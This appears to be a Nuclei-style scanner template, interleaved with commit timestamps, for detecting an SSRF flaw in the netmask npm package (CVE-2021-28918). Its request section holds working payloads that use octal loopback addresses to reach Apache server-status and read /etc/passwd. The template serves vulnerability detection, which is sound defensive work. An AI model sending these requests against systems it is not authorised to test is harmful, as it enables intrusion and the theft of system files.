2021-07-06 06:50:43 +00:00
id : CVE-2021-28918
info :
2022-05-18 20:58:07 +00:00
name : Netmask NPM Package - Server-Side Request Forgery
2021-07-06 06:50:43 +00:00
author : johnjhacking
2021-07-06 07:11:16 +00:00
severity : critical
2022-05-18 20:58:07 +00:00
description : Netmask NPM Package is susceptible to server-side request forgery because of improper input validation of octal strings in netmask npm package. This allows unauthenticated remote attackers to perform indeterminate SSRF, remote file inclusion, and local file inclusion attacks on many of the dependent packages. A remote unauthenticated attacker can bypass packages relying on netmask to filter IPs and reach critical VPN or LAN hosts.
2023-09-06 12:09:01 +00:00
remediation : |
Upgrade to Netmask version 2.0.0 or later, which includes a fix for this vulnerability.
2021-09-03 07:40:35 +00:00
reference :
2021-09-03 07:44:24 +00:00
- https://github.com/sickcodes/security/blob/master/advisories/SICK-2021-011.md
- https://github.com/advisories/GHSA-pch5-whg9-qr2r
2022-05-18 20:58:07 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-28918
2022-05-18 21:10:42 +00:00
- https://github.com/rs/node-netmask
2023-07-11 19:49:27 +00:00
- https://rootdaemon.com/2021/03/29/vulnerability-in-netmask-npm-package-affects-280000-projects/
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 9.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-28918
2023-08-31 11:46:18 +00:00
cwe-id : CWE-704
epss-score : 0.02788
epss-percentile : 0.89291
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 3
2023-07-11 19:49:27 +00:00
vendor : netmask_project
product : netmask
2023-09-06 12:09:01 +00:00
framework : node.js
2023-07-11 19:49:27 +00:00
tags : cve,cve2021,npm,netmask,ssrf,lfi
2021-07-06 06:50:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-06 06:50:43 +00:00
- method : GET
path :
- "{{BaseURL}}/?url=http://0177.0.0.1/server-status"
2021-09-03 04:48:24 +00:00
- "{{BaseURL}}/?host=http://0177.0.0.1/server-status"
- "{{BaseURL}}/?file=http://0177.0.0.1/etc/passwd"
2021-07-06 07:11:16 +00:00
2021-09-03 07:40:35 +00:00
stop-at-first-match : true
2023-07-11 19:49:27 +00:00
2021-09-03 07:40:35 +00:00
matchers-condition : or
2021-07-06 06:50:43 +00:00
matchers :
- type : word
2021-07-06 07:05:03 +00:00
part : body
2021-07-06 06:50:43 +00:00
words :
- "Apache Server Status"
2021-07-06 07:03:18 +00:00
- "Server Version"
2021-09-03 04:48:24 +00:00
condition : and
2021-09-03 07:40:35 +00:00
- type : regex
regex :
- "root:.*:0:0:"